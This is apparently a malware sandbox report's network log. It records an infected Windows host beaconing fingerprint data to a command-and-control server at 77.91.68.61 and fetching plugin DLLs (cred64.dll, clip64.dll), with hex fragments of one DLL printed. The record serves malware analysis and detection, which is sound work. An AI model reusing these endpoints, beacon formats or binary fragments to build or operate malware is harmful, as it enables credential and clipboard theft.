Jul 27, 2023 01:36:21.074961901 CEST	50491	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.207063913 CEST	50491	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.209400892 CEST	50492	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.251606941 CEST	80	50491	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.251761913 CEST	50491	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.254174948 CEST	80	50492	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.254286051 CEST	50492	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.257064104 CEST	50492	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.301718950 CEST	80	50492	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.305363894 CEST	80	50492	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.305553913 CEST	50492	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.416448116 CEST	50492	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.417388916 CEST	50493	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.461268902 CEST	80	50492	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.461328983 CEST	80	50493	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.461397886 CEST	50492	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.461442947 CEST	50493	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.471601009 CEST	50493	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.515688896 CEST	80	50493	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.519720078 CEST	80	50493	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.519829035 CEST	50493	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.636442900 CEST	50493	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.637068033 CEST	50494	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.680731058 CEST	80	50493	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.680917025 CEST	50493	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.681181908 CEST	80	50494	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.681328058 CEST	50494	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.704749107 CEST	50494	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.748883009 CEST	80	50494	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.753135920 CEST	80	50494	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.753236055 CEST	50494	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.870594025 CEST	50494	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.872023106 CEST	50495	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.914592981 CEST	80	50494	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.916054010 CEST	50494	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:24.883147955 CEST	50495	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:30.883646965 CEST	50495	80	192.168.2.5	77.91.68.61

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2023 01:33:39.794218063 CEST	51484	53	192.168.2.5	8.8.8.8
Jul 27, 2023 01:33:39.832540035 CEST	53	51484	8.8.8.8	192.168.2.5
Jul 27, 2023 01:35:36.859174013 CEST	63446	53	192.168.2.5	8.8.8.8
Jul 27, 2023 01:35:36.910212994 CEST	53	63446	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2023 01:33:39.794218063 CEST	192.168.2.5	8.8.8.8	0xb234	Standard query (0)	files.catbox.moe	A (IP address)	IN (0x0001)	false
Jul 27, 2023 01:35:36.859174013 CEST	192.168.2.5	8.8.8.8	0xbf53	Standard query (0)	files.catbox.moe	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2023 01:33:39.832540035 CEST	8.8.8.8	192.168.2.5	0xb234	No error (0)	files.catbox.moe		108.181.20.35	A (IP address)	IN (0x0001)	false
Jul 27, 2023 01:35:36.910212994 CEST	8.8.8.8	192.168.2.5	0xbf53	No error (0)	files.catbox.moe		108.181.20.35	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

files.catbox.moe

owqnotnc.org

77.91.68.29

qsrgpskjgs.net

77.91.124.47

dmivtlj.net

liwhncy.org

chdgimlpjf.com

crpqe.org

fwflp.net

gbxxgvql.net

77.91.68.248

77.91.68.61

rvljh.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49854	108.181.20.35	443	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	50304	108.181.20.35	443	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49726	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:05.129043102 CEST	2746	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:05.176944017 CEST	2746	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.5	49817	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:28.997508049 CEST	2943	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:29.046648026 CEST	2943	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.5	49818	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:29.216526985 CEST	2944	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:29.266484976 CEST	2944	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.5	49819	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:29.436369896 CEST	2945	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:29.487318039 CEST	2945	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.5	49820	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:29.644283056 CEST	2946	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:29.694345951 CEST	2946	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.5	49821	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:29.861624956 CEST	2947	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:29.910104036 CEST	2947	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.5	49822	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:30.082333088 CEST	2947	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:30.131021023 CEST	2948	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.5	49823	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:30.282289028 CEST	2948	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:30.331037045 CEST	2949	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.5	49824	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:30.483436108 CEST	2949	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:30.531375885 CEST	2950	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.5	49825	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:30.698210955 CEST	2950	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:30.747298002 CEST	2951	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.5	49826	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:30.905601025 CEST	2951	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:30.954607010 CEST	2952	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49727	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:05.132884979 CEST	2746	OUT	GET /rock/Plugins/cred64.dll HTTP/1.1 Host: 77.91.68.61
Jul 27, 2023 01:33:05.178277969 CEST	2746	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jul 2023 23:33:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 273 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 37 2e 39 31 2e 36 38 2e 36 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 77.91.68.61 Port 80</address></body></html>
Jul 27, 2023 01:33:05.220284939 CEST	2747	OUT	GET /rock/Plugins/clip64.dll HTTP/1.1 Host: 77.91.68.61
Jul 27, 2023 01:33:05.264944077 CEST	2748	IN	Data Raw: 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff 22 00 00 68 c0 ea 00 10 e8 4c 2a 00 00 59 c3 Data Ascii: ?#hYj8h<h#h`lYj8h<h"hLYj8h<h"h ,Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i\"h)
Jul 27, 2023 01:33:05.264969110 CEST	2749	IN	Data Raw: ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50 e8 5d 20 00 00 83 c4 04 8d 4d 08 83 7d 1c 10 Data Ascii: RQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQA]dB
Jul 27, 2023 01:33:05.264991999 CEST	2751	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 24 Jul 2023 12:36:25 GMT ETag: "16400-6013adce177e0" Accept-Ranges: bytes Content-Length: 91136 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c5 6c be 64 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPELld!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@Bj h<ph
Jul 27, 2023 01:33:05.265028954 CEST	2752	IN	Data Raw: 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08 8b 55 f0 83 fa 10 72 28 8b 4d dc 42 8b c1 81 Data Ascii: t'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E]E
Jul 27, 2023 01:33:05.265067101 CEST	2753	IN	Data Raw: 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24 24 8d 4c 24 44 50 e8 df 0e 00 00 8b 54 24 54 Data Ascii: t{A:Bts%snD$Pt$;D$TD$ D$@B\|$4QCD$$L$DPT$TD$@L$@C\|$Pu81u\|$0D$\|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`BrI#+
Jul 27, 2023 01:33:05.265091896 CEST	2755	IN	Data Raw: 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00 89 74 24 30 68 18 69 01 10 e8 10 04 00 00 8d Data Ascii: RQ\|$thi5t$t$0hiL$xWxr\|$4L$ CL$ ;xudD$r;uD$D$s:u1\|$A:Bu\|$tzA:Bu\|$tkA:Btc_u^ D$P\|
